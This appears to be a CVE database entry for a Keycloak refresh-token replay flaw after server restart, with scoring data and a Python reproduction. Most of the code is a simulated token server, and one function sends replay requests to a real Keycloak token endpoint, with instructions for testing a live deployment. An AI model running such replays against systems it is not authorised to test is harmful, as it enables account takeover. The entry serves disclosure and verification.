CVE-2026-9802

redhat / build_of_keycloak

Description

A flaw was found in Keycloak. When revokeRefreshToken=true is enabled (refresh-token rotation, where each use of a refresh token invalidates the previous one) and persistent session storage is in use, a server restart can reset the internal timing mechanisms that track which refresh token is current for a session. A remote attacker who has previously captured a user's refresh token can therefore replay that token after it has been rotated out and revoked, as long as the underlying session has survived the restart. Successful exploitation grants the attacker unauthorized access to the victim's account, potentially leading to information disclosure or privilege escalation.
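The failure class described above, as an added example that is not Keycloak's code: a session store that survives a restart paired with rotation state that does not, plus a small replay check that can be pointed at a real token endpoint. The OIDC token endpoint path and grant_type=refresh_token used by http_refresh are standard; FakeTokenServer is a constructed, simplified model (a per-session logical clock in place of Keycloak's actual bookkeeping) and the base URL, realm, and client names are assumptions.

```python
"""Added example, not Keycloak's code: does a refresh token that was rotated out
under revokeRefreshToken=true become valid again after a server restart?

http_refresh talks to a real server using the standard OIDC token endpoint.
FakeTokenServer is a constructed model of the failure class: sessions are
persisted, the rotation state is not. It is not Keycloak's implementation.
"""
import json
import secrets
import urllib.error
import urllib.parse
import urllib.request


def token_endpoint(base_url, realm):
    """Standard Keycloak OIDC token endpoint for a realm."""
    return f"{base_url.rstrip('/')}/realms/{realm}/protocol/openid-connect/token"


def http_refresh(base_url, realm, client_id, client_secret=None):
    """Build a refresh callable against a real server (requires network; not used by the test)."""
    def refresh(refresh_token):
        form = {"grant_type": "refresh_token", "refresh_token": refresh_token,
                "client_id": client_id}
        if client_secret:
            form["client_secret"] = client_secret
        req = urllib.request.Request(token_endpoint(base_url, realm),
                                     data=urllib.parse.urlencode(form).encode(),
                                     method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, json.loads(resp.read())
        except urllib.error.HTTPError as err:
            return err.code, json.loads(err.read() or b"{}")
    return refresh


class FakeTokenServer:
    """Constructed model. `sessions` survives restart() (persistent session
    storage); `volatile` is process memory and does not. Each refresh bumps a
    per-session logical clock; a refresh token is accepted only if the clock
    value it carries equals the session's current one."""

    def __init__(self, persist_rotation_state):
        self.persist_rotation_state = persist_rotation_state
        self.sessions = {}   # sid -> {"clock": int}, persisted
        self.volatile = {}   # sid -> int, in-memory only

    def _issue(self, sid, clock):
        self.sessions[sid]["clock"] = clock
        self.volatile[sid] = clock
        return f"{sid}.{clock}.{secrets.token_hex(8)}"

    def login(self):
        sid = secrets.token_hex(8)
        self.sessions[sid] = {}
        return self._issue(sid, 0)

    def refresh(self, refresh_token):
        sid, clock, _ = refresh_token.split(".")
        if sid not in self.sessions:
            return 400, {"error": "invalid_grant"}
        if self.persist_rotation_state:
            current = self.sessions[sid]["clock"]     # hardened: read from persisted session
        else:
            current = self.volatile.get(sid)          # vulnerable: None after a restart
        if current is not None and int(clock) != current:
            return 400, {"error": "invalid_grant",
                         "error_description": "Refresh token revoked"}
        new_clock = (current if current is not None else int(clock)) + 1
        return 200, {"refresh_token": self._issue(sid, new_clock)}

    def restart(self):
        self.volatile.clear()


def run_check(first_token, refresh, restart):
    """Rotate once, then try to replay the old token before and after a restart."""
    status, _ = refresh(first_token)          # first_token is now revoked
    if status != 200:
        raise RuntimeError(f"initial refresh failed with HTTP {status}")
    before, _ = refresh(first_token)
    restart()
    after, _ = refresh(first_token)
    return {"revoked_before_restart": before != 200,
            "replayable_after_restart": after == 200}


if __name__ == "__main__":
    for persist in (False, True):
        srv = FakeTokenServer(persist_rotation_state=persist)
        print("rotation state persisted:", persist,
              run_check(srv.login(), srv.refresh, srv.restart))
```

Against a real deployment, pass http_refresh(...) as the refresh callable, a refresh token obtained by a normal login as first_token, and a restart callable that waits for an operator to restart the server (for example one that blocks on input()); a result of replayable_after_restart=True reproduces the behaviour described above.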

Scoring

CVSS 6.8 (Medium)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
EPSS: 0.28% probability of exploitation · percentile 19.9% · 2026-06-19T12:03:05Z
Last modified: 2026-06-10

Related by meaning (6)

Nearest entities by semantic similarity across the cs-graph corpus.

CVE-2026-8922
CVE-2026-7571
CVE-2026-7507
CVE-2026-4874
CVE-2026-9798
CVE-2026-9796
Sourced from NVD + FIRST.org EPSS. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.